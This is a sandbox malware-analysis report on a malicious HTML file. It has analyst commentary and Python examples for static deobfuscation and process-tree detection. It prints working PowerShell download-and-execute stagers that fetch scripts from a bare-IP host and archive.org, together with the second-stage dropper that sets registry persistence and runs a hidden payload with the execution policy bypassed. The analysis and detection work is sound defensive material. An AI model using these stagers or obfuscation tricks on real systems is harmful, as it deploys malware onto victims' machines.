Summary | ZeroBOX

Encoding.html

Category:  FILE
Machine:   s1_win7_x3201
Started:   March 27, 2021, 11:33 a.m.
Completed: March 27, 2021, 11:35 a.m.
Size:      547.0B
Type:      HTML document, ASCII text, with CRLF line terminators
MD5:       d7bb6b9d1cd02209f89dc0c4759ddd87
SHA256:    641bd546e893a40bbfa95f2658c1e2099c47d14d8281b0ba44647c75fe8783ca
CRC32:     1EC2B44C
ssdeep:    12:M6Qclfh3D5LWMjMcqahRDTEdrNNZh2K1wztaSrBYMSeW:Msp1CMjLqav8Zj1wnFYMdW
Yara:      None matched

DNS

Name                      Response          Post-Analysis Lookup
ia801407.us.archive.org   207.241.228.147

Hosts

IP Address        Status   Action
164.124.101.2     Active   Moloch
198.251.72.110    Active   Moloch
207.241.228.147   Active   Moloch

Suricata Alerts

Flow                                              SID        Signature                                                       Category
TCP 192.168.56.103:49606 -> 207.241.228.147:443   906200056  SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)   undefined
TCP 198.251.72.110:80 -> 192.168.56.103:49608     2018856    ET MALWARE Windows executable base64 encoded                    A Network Trojan was detected
TCP 198.251.72.110:80 -> 192.168.56.103:49608     2029538    ET HUNTING EXE Base64 Encoded potential malware                 Misc activity

The JA3 hit is on the PowerShell HTTPS connection to archive.org (port 49606, the vbs.txt download). JA3 fingerprints the TLS client stack, here the stock Windows 7 .NET/SChannel client, so an SSLBL match attributed to an unrelated family is weak evidence on its own. The two ET alerts sit on the server-to-client half of the single keep-alive connection to 198.251.72.110 (port 49608), i.e. on a response body: the ALL.txt body captured below is plain script, so the base64-encoded executable most likely came back in Server.txt, the file saved as C:\Users\Public\Microsoft.ps1.

Suricata TLS

Flow:        TLSv1  192.168.56.103:49606 -> 207.241.228.147:443
Issuer:      C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2
Subject:     OU=Domain Control Validated, CN=*.us.archive.org
Fingerprint: 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0

This is the HTTPS DownloadFile of vbs.txt from the stage-2 script; it negotiated TLS 1.0 and is the call that failed with the trust-relationship error shown in the console output below.

Time & API Arguments Status Return Repeated

GetComputerNameW   computer_name: WIN7-PC   1 1 0   (11 identical calls)
GetComputerNameA   computer_name: WIN7-PC   1 1 0   (2 identical calls; the 5th and 12th of the 13)
Time & API Arguments Status Return Repeated

IsDebuggerPresent   (no arguments)   0 0   (2 identical calls; return 0, no debugger seen)
Time & API Arguments Status Return Repeated

WriteConsoleW, 9 calls (console_handle 0x00000023, 0x0000002f, 0x0000003b, 0x00000047, 0x00000053, 0x0000005f, 0x00000077, 0x00000083, 0x00000077; each status 1, return 1, repeated 0). The buffers, concatenated in order and translated from the Korean-locale PowerShell messages:

Exception calling "DownloadFile" with "2" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."
At line:14 char:72
+ if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
('https://ia801407.us.archive.org/33/items/vbs_20210313/vbs.txt', $p + 'Run.vbs
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DotNetMethodException
PS C:\Users\Administrator\Desktop>

This is the first DownloadFile in the HBankers function of ALL.txt (line 14 of the original file) failing: the Win7 TLS client could not validate the archive.org connection, so C:\Users\Public\Run\Run.vbs was never written in this run. A .NET method exception is statement-terminating, not script-terminating, so execution continued: the second DownloadFile (plain HTTP from 198.251.72.110) produced C:\Users\Public\Microsoft.ps1, and the hidden powershell.exe that runs it appears in the process tree below. Do not read the sandbox result as "the VBS stage is dead"; on a host with a working root store the first download would succeed.
Time & API Arguments Status Return Repeated

CryptExportKey, 50 calls, every one with buffer: <INVALID POINTER> (a NULL pbData, the form that asks for the required blob size), flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 (PUBLICKEYBLOB); status 1, return 1, repeated 0. Calls per key handle, in order of first appearance:

crypto_handle   calls
0x0042d870      1
0x0042dd30      9
0x0042de70      4
0x0042de30      7
0x0042ddb0      12
0x0042ddf0      1
0x0042dfb0      7
0x0042dff0      9

Size queries for public-key blobs across a handful of handles, with no data actually exported, are consistent with certificate handling during the HTTPS connection to archive.org. Nothing in this block shows the sample generating or exporting key material of its own.
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx   (no arguments)   1 1 0

Network requests

suspicious_features: GET method with no useragent header, Connection to IP address   suspicious_request: GET http://198.251.72.110/ALL.txt
suspicious_features: GET method with no useragent header, Connection to IP address   suspicious_request: GET http://198.251.72.110/Server.txt
request: GET http://www.bing.com/favicon.ico
request: GET http://198.251.72.110/ALL.txt
request: GET http://198.251.72.110/Server.txt

The .NET WebClient sends no User-Agent unless the script sets one, which is what the "no useragent header" feature keys on; a UA-less GET of a .txt from a bare IP is a usable proxy-log hunt. The bing.com favicon fetch is Internet Explorer's own background traffic from opening the HTML sample, not part of the chain.
Time & API Arguments Status Return Repeated

Memory operations, all with process_handle 0xffffffff (the calling process itself), stack_dep_bypass 0, stack_pivoted 0, protection 64 (PAGE_EXECUTE_READWRITE); status 1, return 0, repeated 0.

PID 6532 (the Internet Explorer frame process; the content-process command line below carries SCODEF:6532):

NtAllocateVirtualMemory   base_address 0x5fff0000   region_size 65536   allocation_type 12288 (MEM_COMMIT|MEM_RESERVE)   heap_dep_bypass 1
NtProtectVirtualMemory    base_address 0x5fff0000   length 65536   heap_dep_bypass 1
NtAllocateVirtualMemory   base_address 0x02420000   region_size 8192    allocation_type 4096 (MEM_COMMIT)   heap_dep_bypass 0
NtProtectVirtualMemory    length 4096, heap_dep_bypass 0, 30 calls on single pages: 0x7621e000 (11), 0x761e3000 (2), 0x7620c000 (2), 0x761f3000 (2), 0x7620d000 (2), 0x74ac3000 (2), 0x74b67000 (2), 0x772a9000 (2), 0x76122000 (2), 0x761ce000 (2), 0x72322000 (1)

PID 4168 (the process whose suspended thread PID 6532 resumes, see "Process injection" below):

NtAllocateVirtualMemory   base_address 0x5fff0000   region_size 65536   allocation_type 12288 (MEM_COMMIT|MEM_RESERVE)   heap_dep_bypass 1
NtProtectVirtualMemory    length 4096, heap_dep_bypass 0, 16 calls on single pages: 0x7621e000 (4), 0x761ce000 (2), and one each at 0x761e3000, 0x7620c000, 0x761f3000, 0x7620d000, 0x74ac3000, 0x74b67000, 0x772a9000, 0x76122000, 0x77009000, 0x761ca000

The single-page RWX changes at 0x72xxxxxx-0x77xxxxxx fall inside loaded system DLL images on 32-bit Windows 7, the footprint of inline hooks being installed; sandbox monitors and the browser itself leave the same pattern, so corroborate with a memory dump before attributing it to the sample. The repeated 64 KiB RWX block at 0x5fff0000 in both processes is the one allocation worth pulling and inspecting.
file C:\Users\Public\Microsoft.ps1
file C:\Users\Administrator\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
cmdline Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1

The first two command lines are one stage-1 stager, seen once as passed to ShellExecuteExW ("Powershell") and once as resolved to the full path. With the backticks removed and the three fragments joined it reads: IEX (New-Object Net.WebClient).DownloadString('http://198.251.72.110/ALL.txt') | IEX, so ALL.txt is fetched and evaluated in memory and nothing of stage 1 touches disk. The third command line runs the downloaded Server.txt as Microsoft.ps1 with -windo 1 (the -WindowStyle Hidden prefix form) and the execution policy bypassed. The second file entry is a PowerShell shortcut path with an unexpanded %ProgramData%, recorded as observed.
Time & API Arguments Status Return Repeated

ShellExecuteExW
show_type: 0 (SW_HIDE)
filepath_r: Powershell
filepath: Powershell
parameters: $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
1 1 0

Antivirus

Symantec    ISB.Downloader!gen76
Kaspersky   HEUR:Trojan.Script.Generic
Time & API Arguments Status Return Repeated

GetAdaptersAddresses
flags: 15 (GAA_FLAG_SKIP_UNICAST|GAA_FLAG_SKIP_ANYCAST|GAA_FLAG_SKIP_MULTICAST|GAA_FLAG_SKIP_DNS_SERVER)
family: 0 (AF_UNSPEC)
111 0   (111 = ERROR_BUFFER_OVERFLOW, the size-query call)
Data received (response to GET /ALL.txt)

HTTP/1.1 200 OK
Date: Sat, 27 Mar 2021 02:33:48 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
Last-Modified: Thu, 25 Mar 2021 16:21:40 GMT
ETag: "52b-5be5ecf73b182"
Accept-Ranges: bytes
Content-Length: 1323
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

Body, the stage-2 script, shown one statement per line (the report flattened the original line breaks; the original has more of them, since the PowerShell error places the first DownloadFile on line 14). The ETag size field 0x52b is 1323, matching Content-Length, so the body is complete:

[system.io.directory]::CreateDirectory("C@@$%#@$%#@$%#@$%#$@%#@$%#@$%#Run".Replace("@@$%#@$%#@$%#@$%#$@%#@$%#@$%#",":\Users\Public\"))
start-sleep -s 5
Set-ItemProperty -Path "HK*************************orer\User Shell Folders".Replace("*************************","CU:\Software\Microsoft\Windows\CurrentVersion\Expl") -Name "Run" -Value "C:\&&&&&&&&&&&&&un".Replace("&&&&&&&&&&&&&","Users\Public\R");
Set-ItemProperty -Path "HKCU:\Soft<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<lders".Replace("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<","ware\Microsoft\Windows\CurrentVersion\Explorer\Shell Fo") -Name "Run" -Value "C:\Us>>>>>>>>>>>>un".Replace(">>>>>>>>>>>>","ers\Public\R");
start-sleep -s 5
Function HBankers {
$p = 'C:\Us<<<<<<<<<<<>>>>>>>>>>>>>>>n\'.Replace("<<<<<<<<<<<>>>>>>>>>>>>>>>","ers\Public\Ru")
$ps1 = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ia801407.us.archive.org/33/items/vbs_20210313/vbs.txt', $p + 'Run.vbs')){ }
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('http://198.251.72.110/Server.txt', $ps1 + 'Microsoft.ps1')){ }
start-sleep -s 7
powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\Microsoft.ps1"
}
IEX HBankers

What the .Replace() placeholders and backtick-split names resolve to, in script order:

CreateDirectory("C:\Users\Public\Run")
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Run" -Value "C:\Users\Public\Run"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Run" -Value "C:\Users\Public\Run"
$p = 'C:\Users\Public\Run\'
$ps1 = 'C:\Users\Public\'
(New-Object Net.WebClient).DownloadFile('https://ia801407.us.archive.org/33/items/vbs_20210313/vbs.txt', 'C:\Users\Public\Run\Run.vbs')
(New-Object Net.WebClient).DownloadFile('http://198.251.72.110/Server.txt', 'C:\Users\Public\Microsoft.ps1')
powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\Microsoft.ps1"

The backticks inside "`N`e`T`.`W`e`B`C`l`i`e`N`T" are no-ops in Windows PowerShell 5.1 (only `n, `t, `r, `a, `b, `f, `v and `0 are real escapes there), so the type name is NeT.WeBClieNT, which resolves case-insensitively to Net.WebClient. The registry writes point the Explorer shell-folder value named "Run" at C:\Users\Public\Run; the value name is "Run" rather than the "Startup" value Explorer uses for the per-user Startup folder, and this report does not show whether Explorer honours it, so treat the two Set-ItemProperty writes as the host indicator and confirm the persistence effect on a live system. The sleeps between statements are the usual sandbox-timeout padding.
Data received (207.241.228.147:443, TLS handshake, binary; rendered as text in the original report). Recoverable content: a ServerHello whose server random ends in the DOWNGRD sentinel (RFC 8446 downgrade protection, set because a TLS 1.3-capable server negotiated TLS 1.0 with this client), followed by the certificate chain:

CN=*.us.archive.org, OU=Domain Control Validated (SAN: *.us.archive.org, us.archive.org), issued by Go Daddy Secure Certificate Authority - G2, valid 2019-12-23 to 2022-02-21
Go Daddy Secure Certificate Authority - G2, issued by Go Daddy Root Certificate Authority - G2, valid 2011-05-03 to 2031-05-03
Go Daddy Root Certificate Authority - G2, issued by Go Daddy Class 2 Certification Authority, valid 2014-01-01 to 2031-05-30
Go Daddy Class 2 Certification Authority, self-signed, valid 2004-06-29 to 2034-06-29

Data received (further binary handshake records, omitted)

The chain is a routine publicly issued wildcard certificate, so the trust failure PowerShell reported on this connection comes from the analysis VM's validation environment (root store, revocation reachability, protocol support) rather than from the certificate itself; outside the sandbox the download would be expected to work.

Data sent GET /ALL.txt HTTP/1.1 Host: 198.251.72.110 Connection: Keep-Alive
Data sent (TLS ClientHello to 207.241.228.147:443, binary, with SNI ia801407.us.archive.org)
Data sent (TLS handshake continuation, binary)
Data sent GET /Server.txt HTTP/1.1 Host: 198.251.72.110
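The stager and the ALL.txt body above use three cheap obfuscations: backticks splitting identifiers (I`E`X), "literal".Replace("placeholder","real") chains, and a command assembled from fragments with -Join ''. The following Python is an added example, not code from the report or from the sample, that folds all three statically and pulls out the resulting IOCs. Its inputs are reconstructed here from the command line and three statements of the ALL.txt body; the run lengths of the placeholder characters inside the .Replace() strings are assumed rather than copied byte for byte, which does not affect the technique.

```python
import re

# Inputs reconstructed from this report (constructed here, not captured from the
# sample): the stage-1 command line and three statements of the ALL.txt body.
# The placeholder run lengths inside the .Replace() strings are assumed.
STAGE1_CMDLINE = (
    "$c1='(New-Object Net.We'; $c4='bClient).Downlo'; "
    "$c3='adString(''http://198.251.72.110/ALL.txt'')';"
    "$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X"
)
_STARS, _AMPS, _CARETS = "*" * 25, "&" * 13, "^" * 18
STAGE2_SCRIPT = "\n".join([
    'Set-ItemProperty -Path "HK' + _STARS + 'orer\\User Shell Folders".Replace("' + _STARS
    + '","CU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Expl")'
    ' -Name "Run" -Value "C:\\' + _AMPS + 'un".Replace("' + _AMPS + '","Users\\Public\\R");',
    "$ps1 = 'C" + _CARETS + "blic\\'.Replace(\"" + _CARETS + '",":\\Users\\Pu")',
    'if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"'
    "('http://198.251.72.110/Server.txt', $ps1 + 'Microsoft.ps1')){ }",
])

# Letters that form a real escape after a backtick in Windows PowerShell 5.1.
# Every other backtick (I`E`X, `N`e`T) is a no-op that only breaks up a token.
_PS_ESCAPES = "ntrabfv0"

def strip_backticks(text):
    """Drop backticks that merely split identifiers or method names."""
    return re.sub(r"`(?![" + _PS_ESCAPES + "])", "", text)

# "literal".Replace("old","new"), either quote style on each operand.
_LIT = r"""(?:"([^"]*)"|'([^']*)')"""
_REPLACE = re.compile(_LIT + r"\.Replace\(" + _LIT + r"\s*,\s*" + _LIT + r"\s*\)", re.IGNORECASE)

def _operand(m, group):
    return m.group(group) if m.group(group) is not None else m.group(group + 1)

def fold_replace(text):
    """Evaluate .Replace() on string literals statically; loop so chained calls fold too."""
    def fold(m):
        quote = '"' if m.group(1) is not None else "'"
        return quote + _operand(m, 1).replace(_operand(m, 3), _operand(m, 5)) + quote
    while True:
        folded = _REPLACE.sub(fold, text)
        if folded == text:
            return text
        text = folded

_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
_JOIN = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s*-Join\s*''\s*\)", re.IGNORECASE)

def fold_join(text):
    """Resolve ($a,$b,$c -Join '') from earlier single-quoted assignments, then drop them."""
    values = {m.group(1): m.group(2).replace("''", "'") for m in _ASSIGN.finditer(text)}
    used = set()

    def expand(m):
        names = re.findall(r"\$(\w+)", m.group(1))
        if not all(n in values for n in names):
            return m.group(0)          # leave anything we cannot resolve untouched
        used.update(names)
        return "".join(values[n] for n in names)

    text = _JOIN.sub(expand, text)
    for name in used:                  # the fragment assignments are now dead code
        text = re.sub(r"\$" + name + r"\b\s*=\s*'(?:[^']|'')*'\s*;?\s*", "", text)
    return text

def deobfuscate(text):
    return fold_join(fold_replace(strip_backticks(text)))

_URL = re.compile(r"""https?://[^\s'"()]+""")
_PATH = re.compile(r"""(?<![A-Za-z])[A-Za-z]:\\[^\s'"()]+""")   # drive paths, not HKCU:\
_REG = re.compile(r"""HK(?:CU|LM|CR|U|CC):\\[^'"]+""")

def extract_iocs(text):
    """URLs, file paths and registry keys left behind once the obfuscation is folded."""
    return {
        "urls": sorted(set(_URL.findall(text))),
        "paths": sorted({p.rstrip(";") for p in _PATH.findall(text)}),
        "registry": sorted(set(_REG.findall(text))),
    }

if __name__ == "__main__":
    for sample in (STAGE1_CMDLINE, STAGE2_SCRIPT):
        clean = deobfuscate(sample)
        print(clean)
        print(extract_iocs(clean))
```

Folding is purely static (no PowerShell is run), so the output is safe to produce from a ticket. The case-insensitive .Replace match mirrors PowerShell's method-name lookup, while the replacement itself stays ordinal like .NET String.Replace; the backtick rule deliberately leaves `n, `t and the other real escapes alone so a genuine newline in a sample is not destroyed.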
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW   system_name: (empty)   privilege_name: SeDebugPrivilege   1 1 0   (2 identical calls)
Rule                          Description
win_registry                  Affect system registries
win_token                     Affect system token
win_files_operation           Affect private profile
DebuggerCheck__GlobalFlags    (no description)
DebuggerCheck__QueryInfo      (no description)
DebuggerHiding__Thread        (no description)
DebuggerHiding__Active        (no description)
SEH__vectored                 (no description)
anti_dbg                      Checks if being debugged
disable_dep                   Bypass DEP

These are generic capability rules that key on API-name strings in process memory and fire on ordinary Windows binaries such as powershell.exe and iexplore.exe; read them as context, not as sample-specific evidence. The static Yara scan of the file itself matched nothing (see the summary above).
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:6532 CREDAT:79873
host 198.251.72.110
Time & API Arguments Status Return Repeated

send   socket: 1508   sent: 71    buffer: GET /ALL.txt HTTP/1.1 Host: 198.251.72.110 Connection: Keep-Alive   1 71 0
send   socket: 1520   sent: 127   buffer: (TLS ClientHello, binary, SNI ia801407.us.archive.org)   1 127 0
send   socket: 1520   sent: 134   buffer: (TLS handshake continuation, binary)   1 134 0
send   socket: 1508   sent: 50    buffer: GET /Server.txt HTTP/1.1 Host: 198.251.72.110   1 50 0

Both HTTP requests reuse socket 1508, one keep-alive connection to 198.251.72.110, which is why the two ET alerts above sit on the single flow to port 49608.
parent_process iexplore.exe   martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
parent_process iexplore.exe   martian_process Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
parent_process powershell.exe   martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1

Process injection: Process 6532 resumed a thread in remote process 4168

Time & API Arguments Status Return Repeated

NtResumeThread
thread_handle: 0x0000036c
suspend_count: 1
process_identifier: 4168
1 0 0

PID 6532 is the Internet Explorer frame process (the content-process command line above carries SCODEF:6532). A frame process creating its tab process suspended and resuming it is IE's normal process model, so this signature most likely reflects that rather than injection by the sample; the hand-off that matters is iexplore.exe -> powershell.exe through ShellExecuteExW, followed by powershell.exe -> powershell.exe for the dropped script.

option -exec bypass   value: Attempts to bypass execution policy
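The process tree above is the part of this report that a detection engineer can turn into a rule: a browser spawning powershell.exe, a command line carrying IEX plus fragment-joining, a bare-IP URL, and a second PowerShell started hidden with the execution policy bypassed from C:\Users\Public. The following Python is an added example, not part of the report, that scores process-creation events with those traits. The two malicious events are copied from the command lines in this report; the benign control event, the rule weights and the alert threshold are constructed assumptions for the example. Note that the fragmented stager never contains the word DownloadString, so the rule that catches it is the -Join '' idiom together with IEX, not the cradle name.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str     # parent image name, e.g. iexplore.exe
    image: str      # child image path
    cmdline: str    # child command line

# Parents that have no business launching PowerShell on a workstation (assumed list).
UNUSUAL_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe",
                   "winword.exe", "excel.exe", "outlook.exe"}

# (name, regex over the normalised command line, weight); weights are assumptions.
RULES = [
    ("download_cradle", r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b", 3),
    ("iex", r"\biex\b|invoke-expression", 3),
    ("fragment_join", r"-join\s*''", 2),                    # ($a,$b,$c -Join '') assembly
    ("bare_ip_url", r"https?://\d{1,3}(?:\.\d{1,3}){3}/", 2),
    ("exec_bypass", r"-exec(?:utionpolicy)?\s+bypass", 2),
    ("hidden_window", r"-w[a-z]*\s+(?:1|hidden)\b", 2),     # -windo 1 == -WindowStyle Hidden
    ("public_dir", r"c:\\users\\public\\", 1),
]
SUSPICIOUS = 5  # alert threshold, an assumption for this example

def normalise(cmdline):
    """Lower-case, drop token-splitting backticks (I`E`X -> iex) and collapse whitespace.
    Real escapes such as `n are rare in one-line stagers; a full deobfuscator would keep them."""
    return re.sub(r"\s+", " ", cmdline.replace("`", "")).lower()

def score(ev):
    """Return (total, [hit names]) for one process-creation event."""
    hits = []
    if ev.image.lower().endswith("powershell.exe") and ev.parent.lower() in UNUSUAL_PARENTS:
        hits.append(("unusual_parent", 4))
    cl = normalise(ev.cmdline)
    for name, pattern, weight in RULES:
        if re.search(pattern, cl):
            hits.append((name, weight))
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(events):
    """Events at or above the threshold as (event, total, hit names), worst first."""
    scored = [(ev, *score(ev)) for ev in events]
    return sorted([s for s in scored if s[1] >= SUSPICIOUS], key=lambda s: -s[1])

PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Two events taken from this report's process tree plus one constructed benign control.
STAGE1_EVENT = ProcEvent("iexplore.exe", PS_EXE,
    '"' + PS_EXE + '" ' + "$c1='(New-Object Net.We'; $c4='bClient).Downlo'; "
    "$c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X")
STAGE2_EVENT = ProcEvent("powershell.exe", PS_EXE,
    '"' + PS_EXE + '" -windo 1 -noexit -exec bypass -file C:\\Users\\Public\\Microsoft.ps1')
BENIGN_EVENT = ProcEvent("explorer.exe", PS_EXE,
    "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1")

if __name__ == "__main__":
    for ev, total, hits in triage([STAGE1_EVENT, STAGE2_EVENT, BENIGN_EVENT]):
        print(total, ev.parent, "->", hits)
```

The stage-1 event scores on the parent, IEX, the join idiom and the bare-IP URL; the stage-2 event scores on hidden window, policy bypass and the Users\Public path, each of which is unremarkable alone but rarely co-occur in legitimate automation. Tune the weights against your own process-creation telemetry before alerting on them.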
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Program Files\DVD Maker\DVDMaker.exe
file C:\Windows\System32\unregmp2.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe